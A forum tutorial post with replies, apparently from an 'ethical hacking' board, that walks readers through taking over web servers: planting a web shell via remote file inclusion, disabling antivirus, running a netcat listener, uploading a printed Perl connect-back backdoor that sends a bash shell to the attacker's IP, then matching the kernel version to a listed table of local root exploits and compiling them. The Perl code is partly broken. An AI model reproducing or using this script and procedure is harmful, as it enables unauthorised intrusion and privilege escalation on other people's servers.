Rooting Tutorial

XXxxImmortalxxXX's Avatar author of Rooting Tutorial
This is an article on Rooting Tutorial in Ethical hacking Tips.
Rated 5.00 By 14 users

Hello Everyone and welcome to my tutorial on rooting boxes!! Today you will learn one of many methods to rooting an "insecure" box. Obviously if you are reading this I don't think you will be using any 0-day kernel exploits :P. So basic things you will need for this tutorial to work for you will be the following:

Shell Access on a website is the first thing you will need. How you gain this access is entirely up to you. I would say most people will end up going with a simple remote file inclusion and place yourself a c99, r57, locust or any shell of your choice.

You will want to get yourself a version of NetCat Which you can find at this location

If you have an antivirus that auto deletes infected files or virii i would suggest disabling it as some av's will detect netcat as a hacktool or remote admin tool. Once you have downloaded netcat open netcat up and it will ask you to enter a string for the command line. Reading up on netcat is recommended but if your lazy a string like this will do just fine

-vv -l -n -p <porttoconnecton>
From there you will want to aquire a nice back-connect. I preffer to use one thats not in the shell because i find that those back connects work shitty so i will provide you with one that i use. Very simple to use just save as "" then upload to server and end execute.

perl <youriphere> <porttoconnecton>
Code: PERL
use IO::Socket;
#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell         
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90                                         
#lord@SlackwareLinux:/home/programing$ perl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#Usage: [Host] [Port]
#Ex: 2121
#lord@SlackwareLinux:/home/programing$ perl 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#[*] Resolving HostName
#[*] Connecting...
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [] from localhost [] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#uid=1001(lord) gid=100(users) groups=100(users)
$system    = '/bin/bash';
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 2121 \n";
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
open(STDIN, ">&SOCKET");
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "
**Note that if you are running a router or wireless on multiple ips set by your dhcp you might have to forward the <porttoconnecton> to what ever the ip of your computer is. You can check this by opening command prompt and typing ipconfig you should get an ip that looks similar to which is the ip to forward to. If you are unsure about how to forward your port check out this site and find your router model.

So Now that you have your tools and you have your shell access open up netcat and type in -vv -l -n -p 8080 for this tutorial we will connect on port 8080. Hit enter and it should start listening.

Go back to the server and upload your Execute the back connect with a command such as perl <yourip> 8080. once you execute this you can go back to the shell and it should have connected. With this particular back connect you don't have to find the kernel version because it displays it for you once it connects, but for those of you who are using a different back connect to find the os kernel version and userid you can type something like this into the shell and it will give you the info.
uname -a;id
Once executed you will see something probably similar to

Linux 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The important information here that you want is the OS & Kernel Ver. which in this case would be Linux and the kernel ver. is 2.6.8-2 and you can see the last update of it was in 2005 so it's fairly old. which is a good thing for us.

Here is a kernel refrence for you all this will tell you what exploits work for the differenet kernels. Just to give you a general idea. note that this refrence is kind of old but is still pretty accurate but there could be newer exploits now.

2.2 ->  ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_******_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c
Once you have found the Kernel ver. of the server you are about to root you need to find the Local Root Exploit for that kernel which you can find with google using the list above. Once you have found your Exploit you will want to compile it assuming it's in c which most are. To compile your xpl.c what you want to do is place the xpl.c on the server where you placed you and then compile it. To Compile your c scripts go to your shell that you have spawned with netcat and type:

gcc xpl.c -o xpl
This will compile your xpl.c to a file named xpl.

From here now all you have to do is run your exploit which can be done by simply typing in your netcat connection

It should execute the exploit file which you have just compiled and give you root depending on what the exploit requires. Some require nothing but running them. Others such as h0llyshit require a large file to exploit or to be made to exploit but this is just to explain how to root. you can read up on h0llyshit from here if you would like.

I know that there are many other methods to rooting boxes but this is one method that is people can use that is fairly easy to follow. If you have any comments about the method feel free to ask but please don't knock it down. If you do not like this method thats fine you can write a tutorial for everyone using your own method.

Hope you enjoyed this tutorial and i hope it was helpful to you.

Tutorial by w3tw0rk shoutz to rootshell security team
BukiBv like this
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Nicely written and bookmarked in facebook. Also I guess you have the permission to post the tut here.
XXxxImmortalxxXX's Avatar
Invasive contributor
Thankyou sir
Bakalinvadbad's Avatar
Newbie Member
Great site! I'm impressed.
XXxxImmortalxxXX's Avatar
Invasive contributor
XXxxImmortalxxXX's Avatar
Invasive contributor
thankyou so much sir
Kaleb32's Avatar, Join Date: Jul 2008
Go4Expert Member
This is my first post and this really helped me out with rooting problems
XXxxImmortalxxXX's Avatar
Invasive contributor
ohh Well thanks mate lol ummm post ur adventures on what all you have done with this tutorial. also go to for your more rooting needs
GreenGrass's Avatar, Join Date: Jul 2008
Ambitious contributor
Nice one.